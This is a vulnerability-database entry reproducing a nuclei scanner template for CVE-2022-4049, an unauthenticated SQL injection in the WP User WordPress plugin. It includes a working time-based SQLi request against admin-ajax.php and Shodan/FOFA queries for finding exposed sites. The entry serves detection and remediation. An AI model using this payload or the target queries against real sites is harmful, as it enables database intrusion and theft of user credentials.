Lucene search
K

WP User <= 7.0 - Unauthenticated SQLi

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 24 Views

The WP User WordPress Plugin v7.0 allows unauthenticated SQL injectio

Related
Refs
Code
ReporterTitlePublishedViews
Family
CNNVD
WordPress plugin WP User SQL注入漏洞
2 Jan 202300:00
cnnvd
CVE
CVE-2022-4049
2 Jan 202321:49
cve
Cvelist
CVE-2022-4049 WP User <= 7.0 - Unauthenticated SQLi
2 Jan 202321:49
cvelist
NVD
CVE-2022-4049
2 Jan 202322:15
nvd
Prion
Sql injection
2 Jan 202322:15
prion
Positive Technologies
PT-2023-13793 · WordPress · Wp User
2 Jan 202300:00
ptsecurity
RedhatCVE
CVE-2022-4049
22 May 202523:24
redhatcve
Vulnrichment
CVE-2022-4049 WP User <= 7.0 - Unauthenticated SQLi
2 Jan 202321:49
vulnrichment
wpexploit
WP User <= 7.0 - Unauthenticated SQLi
9 Dec 202200:00
wpexploit
WPVulnDB
WP User <= 7.0 - Unauthenticated SQLi
9 Dec 202200:00
wpvulndb
Rows per page
id: CVE-2022-4049

info:
  name: WP User <= 7.0 - Unauthenticated SQLi
  author: theamanrawat
  severity: critical
  description: |
    The WP User WordPress plugin through 7.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by unauthenticated users.
  impact: |
    Unauthenticated attackers can execute time-based blind SQL injection through the id parameter in wpuser_group_action AJAX endpoint, potentially extracting sensitive database information including user credentials, personal data, and WordPress configuration.
  remediation: |
    Update WP User plugin to a version later than 7.0 that properly sanitizes and parameterizes the id parameter in admin-ajax.php.
  reference:
    - https://wpscan.com/vulnerability/9b0781e2-ad62-4308-bafc-d45b9a2472be
    - https://wordpress.org/plugins/wp-user/
    - https://nvd.nist.gov/vuln/detail/CVE-2022-4049
    - https://github.com/cyllective/CVEs
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-4049
    cwe-id: CWE-89
    epss-score: 0.04756
    epss-percentile: 0.90765
    cpe: cpe:2.3:a:wp_user_project:wp_user:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: "true"
    max-request: 4
    vendor: wp_user_project
    product: wp_user
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/wp-user/
    fofa-query: body=/wp-content/plugins/wp-user/
    publicwww-query: /wp-content/plugins/wp-user/
  tags: time-based-sqli,cve,cve2022,sqli,wpscan,wordpress,wp-plugin,wp,wp-user,unauth,wp_user_project,vuln

http:
  - raw:
      - |
        GET {{path}} HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        action=wpuser_group_action&group_action=x&wpuser_update_setting={{nonce}}&id=1+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))khkM)

    attack: clusterbomb
    payloads:
      path:
        - "/index.php/user/"
        - "/user"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - duration>=6
          - status_code == 200
          - contains(header_2, "text/html")
          - contains(body_2, 'Invalid Access')
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - '"wpuser_update_setting":"([0-9a-zA-Z]+)"'
        internal: true
# digest: 490a00463044022100bfd7c87add636e0079868c453fde7e804bf5de236f04abbbb2c0c691de7bc359021f70e742842917accfcfdee65fc7103e2ff491af139b348471da8fa1658e1511:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 3.19.8
EPSS0.04756
SSVC
24